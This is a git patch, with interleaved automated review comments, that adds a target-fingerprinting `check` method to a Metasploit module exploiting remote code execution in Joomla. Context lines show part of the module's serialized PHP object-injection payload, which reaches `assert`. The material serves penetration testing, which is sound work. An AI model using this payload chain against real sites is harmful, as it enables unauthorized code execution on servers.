From b9b280954bc45f659c1fad10efed982fee3ca098 Mon Sep 17 00:00:00 2001
From: wchen-r7
Date: Tue, 15 Dec 2015 11:03:36 -0600
Subject: [PATCH] Add a check for joomla
---
 .../multi/http/joomla_http_header_rce.rb | 46 +++++++++++++++++++
 1 file changed, 46 insertions(+)
diff --git a/modules/exploits/multi/http/joomla_http_header_rce.rb b/modules/exploits/multi/http/joomla_http_header_rce.rb
index 6d621faf21..9881b5945e 100644
--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -49,6 +49,39 @@ class Metasploit3 < Msf::Exploit::Remote
 ], self.class)
 end
 
+ def check
+ res = send_request_cgi({'uri' => target_uri.path })
+
+ unless res
+ vprint_error("Connection timed out")
+ return Exploit::CheckCode::Unknown
+ end
+
+ unless res.headers['X-Powered-By']
+ vprint_error("Unable to determine the PHP version.")
+ return Exploit::CheckCode::Unknown
+ end
+
+ php_version = res.headers['X-Powered-By'].scan(/PHP\/([\d\.]+)/i).flatten.first || ''
+ vprint_status("Found PHP version: #{php_version}")
+
+ if php_version > '5.3'
+ vprint_error('This module currently does not work against this PHP version')
+ return Exploit::CheckCode::Safe
+ end
+
+ res.get_html_meta_elements.each do |element|
+ if element.attributes['name'] &&
+ /^generator$/i === element.attributes['name'] &&
+ element.attributes['content'] &&
+ /joomla/i === element.attributes['content'].value
+ return Exploit::CheckCode::Detected
+ end
+ end
+
+ Exploit::CheckCode::Safe
+ end
+
 def get_payload
 pre = "#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|"
 middle = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
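Review bot: `php_version > '5.3'` in `check` compares two Strings, so the ordering is lexicographic rather than by version, and an `X-Powered-By` value that carries no PHP version leaves `php_version` as `''`, which logs an empty "Found PHP version:" and passes the test as if the version were in range. Treating the empty case as undetermined and comparing parsed versions would be more reliable: `return Exploit::CheckCode::Unknown if php_version.empty?` followed by `if Gem::Version.new(php_version) > Gem::Version.new('5.3')`. Every 5.3.x string (a constructed `5.3.10`, say) is greater than `'5.3'` under either comparison, so if the 5.3 series is meant to be in range the bound should be written against 5.4 instead. Both `Safe` results (version too new for the module, no generator meta tag found) describe what the module could not confirm rather than evidence that the target is patched; a comment saying so would keep the result from being read as an assessment verdict.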
@@ -58,7 +91,20 @@ class Metasploit3 < Msf::Exploit::Remote
 return "#{pre}#{middle}s:#{pay.length}:\"#{pay}#{middle2}#{post}"
 end
 
+ def print_status(msg='')
+ super("#{peer} - #{msg}")
+ end
+
+ def print_error(msg='')
+ super("#{peer} - #{msg}")
+ end
+
 def exploit
+ if check == Exploit::CheckCode::Safe
+ print_error('Target seems safe, so we will not continue.')
+ return
+ end
+
 print_status("Sending payload ...")
 res = send_request_cgi({
 'method' => 'GET',
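Review bot: The new guard in `exploit` stops only when `check` returns `Safe`, so an `Unknown` result (no response, or no `X-Powered-By` header, per the `check` added in this commit) still falls through to the request that follows, against a host that was never identified as Joomla. If the intent is to send only to identified targets, `unless check == Exploit::CheckCode::Detected` with the same early return states that directly; otherwise a comment such as `# Unknown is deliberately treated as "proceed"` would record the decision. The `print_status`/`print_error` overrides would read better with a one-line comment (`# Prefix module output with the target peer`) and conventional `msg = ''` spacing. `exploit` continues past the end of the hunk.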